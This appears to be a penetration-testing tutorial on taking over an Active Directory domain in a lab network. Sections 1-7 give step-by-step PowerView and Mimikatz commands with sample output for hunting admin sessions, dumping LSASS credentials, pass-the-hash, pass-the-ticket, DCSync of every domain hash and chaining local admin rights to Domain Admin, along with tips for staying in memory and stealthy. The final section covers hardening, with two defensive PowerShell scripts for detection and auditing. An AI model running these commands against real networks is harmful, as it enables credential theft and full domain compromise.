1. Session Hunting — Finding Where Domain Admins Are Logged In
The most direct path to Domain Admin is finding a machine where a DA is currently logged in, then dumping their credentials from memory. PowerView's Find-DomainUserLocation (formerly Invoke-UserHunter) queries every domain computer's active sessions and compares them against privileged group membership.
Use -Stealth mode or target specific high-value machines instead of scanning every computer in the domain.
# Find machines where Domain Admins are currently logged in
PS C:\AD\Tools> Find-DomainUserLocation -Verbose
# Stealth mode — only queries DCs, file servers and machines with many connections
PS C:\AD\Tools> Find-DomainUserLocation -Stealth
# Target a specific group (e.g. find where Enterprise Admins are)
PS C:\AD\Tools> Find-DomainUserLocation -GroupName "Enterprise Admins"
# Check sessions on a specific machine you already have access to
PS C:\AD\Tools> Get-NetLoggedon -ComputerName masaaki-adminsrv
PS C:\AD\Tools> Get-NetSession -ComputerName masaaki-dc
# Example output — masaaki_admin is logged in on masaaki-adminsrv:
UserName : masaaki_admin
ComputerName: masaaki-adminsrv.masaaki-corp.local
IPAddress : 192.168.1.50
Once you've identified the target machine, connect to it (you need local admin on it), then dump credentials from LSASS memory.
2. Credential Dumping with Mimikatz
Mimikatz extracts credentials from Windows memory (LSASS process). It can retrieve plaintext passwords (if WDigest is enabled), NTLM hashes, Kerberos tickets, and cached credentials — all from the LSASS process which holds authentication data for every currently logged-in user.
# Connect to the target machine where masaaki_admin is logged in
PS C:\AD\Tools> Enter-PSSession -ComputerName masaaki-adminsrv
# Run Mimikatz — dump all sekurlsa credentials
PS [masaaki-adminsrv]: C:\AD\Tools> .\Mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
# privilege::debug gives Mimikatz the SeDebugPrivilege needed to read LSASS
# sekurlsa::logonpasswords dumps all cached credentials
# Example output:
Authentication Id : 0 ; 123456
Session : Interactive from 2
UserName : masaaki_admin
Domain : MASAAKI-CORP
NTLM : aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
Key credential types Mimikatz can extract:
NTLM hashes: Used for Pass-the-Hash. Format: LM:NT. The NT hash is what you need. Can be cracked offline or used directly for authentication.
Kerberos tickets: Extracted from LSASS memory. Can be injected into your session for Pass-the-Ticket attacks without needing the password or hash.
Plaintext passwords: Available if WDigest authentication is enabled (default on older systems). Windows 10/2012R2+ disable this by default but it can be re-enabled via registry.
Cached domain credentials: MSCASHv2 (DCC2) hashes of the last 10 domain logons, stored locally so the machine can still authenticate those users when no DC is reachable. Crack with hashcat (-m 2100).
The PowerShell version of Mimikatz runs entirely in memory — no binary touches disk on the remote machine. This is the preferred method during engagements.
# Load Invoke-Mimikatz
PS C:\AD\Tools> . .\Invoke-Mimikatz.ps1
# Dump credentials on the local machine
PS C:\AD\Tools> Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'
# Dump credentials on a remote machine (requires local admin on target)
PS C:\AD\Tools> Invoke-Mimikatz -DumpCreds -ComputerName masaaki-adminsrv
# Dump credentials on multiple machines at once
PS C:\AD\Tools> Invoke-Mimikatz -DumpCreds -ComputerName @('masaaki-adminsrv','masaaki-dev01')
3. Pass-the-Hash (PTH)
Windows NTLM authentication does not require you to know the plaintext password — only the NTLM hash. Pass-the-Hash injects the hash directly into a new authentication session, impersonating the account without ever cracking the password. This works for local accounts and domain accounts.
# Use Mimikatz sekurlsa::pth to inject the hash and spawn a process as the target user
PS C:\AD\Tools> .\Mimikatz.exe "sekurlsa::pth /user:masaaki_admin /domain:masaaki-corp.local /ntlm:32ed87bdb5fdc5e9cba88547376818d4 /run:powershell.exe" exit
# A new PowerShell window opens running as masaaki_admin
# The NTLM hash was injected — no password needed
# Verify in the new window
PS C:\AD\Tools> whoami
masaaki-corp\masaaki_admin
# Now use the session to access resources as DA
PS C:\AD\Tools> Enter-PSSession -ComputerName masaaki-dc
4. Over-Pass-the-Hash (OPtH) — Getting a Kerberos TGT from an NTLM Hash
Over-Pass-the-Hash (also called Pass-the-Key) uses the NTLM hash to request a proper Kerberos TGT from the DC. The result: a full Kerberos session that works everywhere NTLM is blocked or degraded. This is the preferred technique in modern AD environments that enforce Kerberos.
# Use sekurlsa::pth with /run:cmd.exe — same syntax, but Kerberos TGT is auto-requested
PS C:\AD\Tools> .\Mimikatz.exe "sekurlsa::pth /user:masaaki_admin /domain:masaaki-corp.local /ntlm:32ed87bdb5fdc5e9cba88547376818d4 /run:cmd.exe" exit
# In the new CMD window — trigger Kerberos authentication (any network access works)
C:\> dir \\masaaki-dc\C$
# This causes Windows to request a TGT for masaaki_admin from the DC using the hash
# Check the ticket was issued:
C:\> klist
Cached Tickets: (2)
#0 Client: masaaki_admin @ MASAAKI-CORP.LOCAL
Server: krbtgt/MASAAKI-CORP.LOCAL @ MASAAKI-CORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
# Now use Kerberos-authenticated PS Remoting
PS C:\AD\Tools> Enter-PSSession -ComputerName masaaki-dc.masaaki-corp.local
5. Pass-the-Ticket (PTT)
Pass-the-Ticket extracts a Kerberos ticket (TGT or TGS) from one machine and injects it into a session on another, impersonating the ticket's owner. This is useful when you have a TGT for a privileged account but no hash or password.
# Export all Kerberos tickets from the current session
PS C:\AD\Tools> .\Mimikatz.exe "sekurlsa::tickets /export" exit
# This creates .kirbi files for every ticket in memory
# Identify the DA ticket (each exported file is named <LUID>-...-<user>@<service>-<REALM>.kirbi):
[0;3e4]-<...>-masaaki_admin@krbtgt-MASAAKI-CORP.LOCAL.kirbi
# Inject the ticket into your current session
PS C:\AD\Tools> .\Mimikatz.exe "kerberos::ptt [0;3e4]-<...>-masaaki_admin@krbtgt-MASAAKI-CORP.LOCAL.kirbi" exit
# Verify the ticket is loaded
PS C:\AD\Tools> klist
# Access DC resources with the injected ticket
PS C:\AD\Tools> dir \\masaaki-dc\C$
PS C:\AD\Tools> Enter-PSSession -ComputerName masaaki-dc
6. DCSync — Replicating All Hashes from the DC
DCSync is the most powerful credential attack in Active Directory. Instead of running Mimikatz on the DC itself (which requires physical access or SYSTEM on the DC), DCSync uses legitimate AD replication protocols to ask the DC to send you password hashes — exactly as a second DC would during synchronisation.
To run DCSync you need one of: Domain Admin rights, Enterprise Admin rights, or the two replication permissions on the domain object (DS-Replication-Get-Changes + DS-Replication-Get-Changes-All). See Blog 1 for how to grant yourself these via ACL abuse.
# Extract the krbtgt hash — the key to Golden Ticket attacks
PS C:\AD\Tools> .\Mimikatz.exe "lsadump::dcsync /user:masaaki-corp\krbtgt" exit
# Example output:
Object RDN : krbtgt
SAM Username : krbtgt
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID : 502
Credentials:
Hash NTLM: 4e9a25a62b7b4c8c2b6e11f3a9d0e9a2
ntlm- 0: 4e9a25a62b7b4c8c2b6e11f3a9d0e9a2
# DCSync the Domain Administrator account
PS C:\AD\Tools> .\Mimikatz.exe "lsadump::dcsync /user:masaaki-corp\Administrator" exit
# Dump ALL hashes from the domain (equivalent to NTDS.dit extraction)
PS C:\AD\Tools> .\Mimikatz.exe "lsadump::dcsync /domain:masaaki-corp.local /all /csv" exit
# Save to file for offline cracking
PS C:\AD\Tools> .\Mimikatz.exe "lsadump::dcsync /domain:masaaki-corp.local /all /csv" exit | Out-File hashes.txt
7. Derivative Local Admin — Chaining Access to Domain Admin
Derivative local admin is the technique of chaining local admin access across machines until you reach one with a DA session. You are not exploiting anything — you are legitimately using admin rights you have, hopping machine to machine until credentials from a privileged account land in your hands.
low-priv domain user → local admin on masaaki-dev01 (via group membership) → Mimikatz → masaaki_svc hash → PTH → local admin on masaaki-adminsrv → Mimikatz → masaaki_admin (DA) TGT → Domain Admin
# Step 1: You already have local admin on masaaki-dev01 (found with Find-PSRemotingLocalAdminAccess)
# Dump creds from masaaki-dev01
PS C:\AD\Tools> Invoke-Mimikatz -DumpCreds -ComputerName masaaki-dev01
# Found: masaaki_svc NTLM hash: 7a6c2f1b9d4e8f3c5a2b1e9d4f6a3c8b
# Step 2: PTH as masaaki_svc
PS C:\AD\Tools> .\Mimikatz.exe "sekurlsa::pth /user:masaaki_svc /domain:masaaki-corp.local /ntlm:7a6c2f1b9d4e8f3c5a2b1e9d4f6a3c8b /run:powershell.exe" exit
# Step 3: masaaki_svc has local admin on masaaki-adminsrv — dump creds there
PS C:\AD\Tools> Invoke-Mimikatz -DumpCreds -ComputerName masaaki-adminsrv
# Found: masaaki_admin TGT in memory (Domain Admin is logged in here)
# Step 4: Export and inject the TGT
PS C:\AD\Tools> .\Mimikatz.exe "sekurlsa::tickets /export" exit
PS C:\AD\Tools> .\Mimikatz.exe "kerberos::ptt <LUID>-<...>-masaaki_admin@krbtgt-MASAAKI-CORP.LOCAL.kirbi" exit
# Step 5: Domain Admin access
PS C:\AD\Tools> Enter-PSSession -ComputerName masaaki-dc
8. Prevention & Detection
Protected Users group: Accounts in this group cannot use NTLM, DES or RC4 Kerberos encryption, and their credentials are not cached in LSASS. Add all privileged accounts. Breaks PTH and most Mimikatz extractions for those accounts.
Credential Guard: Isolates LSASS secrets in a Hyper-V (virtualization-based security) protected container. Mimikatz cannot read them from LSASS even with SYSTEM access. Requires UEFI and Secure Boot.
DCSync detection: Alert on event 4662 where Object Type is domainDNS and Properties include the two replication GUIDs (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All). Any account that is not a domain controller's machine account performing replication is anomalous.
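The 4662 hunt described above, written out as a PowerShell script. This is an added example, not code from the original post or from any tool it mentions. It assumes "Audit Directory Service Access" is enabled on the DC and the domain object's SACL audits the replication extended rights (otherwise no 4662 is logged), and that the ActiveDirectory RSAT module is available to list the domain controllers. The GUIDs are the documented schema values for the replication extended rights and the domainDNS class; the parameter names are this script's own.

```powershell
# Added example (not from the original post): hunt for DCSync in a domain controller's
# Security log. Assumes DS Access auditing is enabled, the domain object's SACL audits the
# replication extended rights, and the ActiveDirectory RSAT module is installed.
param(
    [string]$ComputerName = $env:COMPUTERNAME,   # DC whose Security log to query
    [int]$Hours = 24                            # look-back window
)

# Extended-right GUIDs from the AD schema (documented values, not page-specific).
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}
# schemaIDGUID of the domainDNS class; 4662 shows ObjectType either by name or as this GUID.
$DomainDnsClass = '19195a5b-6da0-11d0-afd3-00c04fd930c9'

# Domain controllers replicate legitimately, under their machine accounts (NAME$).
$DcAccounts = @((Get-ADDomainController -Filter *).Name | ForEach-Object { "$_`$" })

$Filter = @{ LogName = 'Security'; Id = 4662; StartTime = (Get-Date).AddHours(-$Hours) }

Get-WinEvent -ComputerName $ComputerName -FilterHashtable $Filter -ErrorAction SilentlyContinue |
    ForEach-Object {
        # Flatten the EventData <Data Name="..."> elements into a hashtable.
        $xml = [xml]$_.ToXml()
        $d = @{}
        foreach ($n in $xml.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }

        # Properties lists the GUIDs of the rights that were exercised on the object.
        $used = @($ReplicationRights.Keys | Where-Object { $d['Properties'] -match $_ })
        if ($used.Count -gt 0 -and $d['ObjectType'] -match "domainDNS|$DomainDnsClass") {
            [pscustomobject]@{
                Time           = $_.TimeCreated
                Subject        = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
                Object         = $d['ObjectName']
                Rights         = ($used | ForEach-Object { $ReplicationRights[$_] }) -join ', '
                # Replication by anything other than a DC machine account is the DCSync signal.
                FromController = [string]$d['SubjectUserName'] -in $DcAccounts
            }
        }
    } |
    Where-Object { -not $_.FromController }
```

Run it on a DC (or pass -ComputerName for one) and feed the output to your SIEM or a scheduled task; an empty result is the expected steady state, and any row is a non-DC principal asking the DC for password data. Keep the DC allow-list current, since a stale list will flag a newly promoted DC as an attacker.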
Tiered administration: DAs should NEVER log into Tier 1 or Tier 2 machines. If a DA never logs into workstations, their credentials can never be stolen from workstation LSASS memory.
Disable WDigest: Ensure HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential is set to 0 across all machines via GPO. This blocks plaintext password extraction via Mimikatz.
LSA Protection (RunAsPPL): Enable LSASS as a Protected Process Light via HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL = 1. Mimikatz requires a kernel driver to bypass this, significantly raising the cost of the attack.
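A compliance check for the host hardening items above (WDigest, RunAsPPL, Credential Guard) plus the Protected Users membership check, as an added PowerShell example that is not part of the original post. It assumes PS Remoting to any remote hosts you name and the ActiveDirectory RSAT module on the machine running it; the registry paths are the ones the post cites, the Win32_DeviceGuard class is the documented Credential Guard status source, and the output property names are this script's own.

```powershell
# Added example (not from the original post): audit LSASS hardening on one or more hosts and
# list Domain Admins that are missing from Protected Users. Assumes PS Remoting and RSAT.
param(
    [string[]]$ComputerName = @($env:COMPUTERNAME)
)

$HostChecks = {
    $wd  = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -ErrorAction SilentlyContinue
    $lsa = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction SilentlyContinue
    # Win32_DeviceGuard.SecurityServicesRunning contains 1 while Credential Guard is running.
    $dg  = Get-CimInstance -Namespace root\Microsoft\Windows\DeviceGuard -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
    [pscustomobject]@{
        Host               = $env:COMPUTERNAME
        # The GPO control is an explicit 0; an absent value falls back to the OS default,
        # which is "enabled" on the older systems the post mentions.
        UseLogonCredential = $wd.UseLogonCredential
        WDigestSetToZero   = ($wd.UseLogonCredential -eq 0)
        # 1 = PPL with UEFI lock, 2 = PPL without UEFI lock (newer builds); both protect LSASS.
        LsaProtection      = ($lsa.RunAsPPL -in 1, 2)
        CredentialGuard    = [bool]($dg.SecurityServicesRunning -contains 1)
    }
}

# Run the checks locally where possible, otherwise over PS Remoting.
$results = foreach ($c in $ComputerName) {
    if ($c -ieq $env:COMPUTERNAME) { & $HostChecks }
    else { Invoke-Command -ComputerName $c -ScriptBlock $HostChecks }
}
$results | Format-Table -AutoSize

# Protected Users is what removes NTLM/PTH and LSASS caching for an account, so every
# Domain Admin should be in it; anything printed here is a gap to close.
$protected = @((Get-ADGroupMember 'Protected Users' -Recursive).SamAccountName)
Get-ADGroupMember 'Domain Admins' -Recursive |
    Where-Object { $_.objectClass -eq 'user' -and $_.SamAccountName -notin $protected } |
    Select-Object SamAccountName, DistinguishedName
```

A host passes when WDigestSetToZero, LsaProtection and CredentialGuard are all True; run it against the Tier 0 servers first, then the jump hosts and admin workstations, since those are exactly the machines the session-hunting step in section 1 goes looking for.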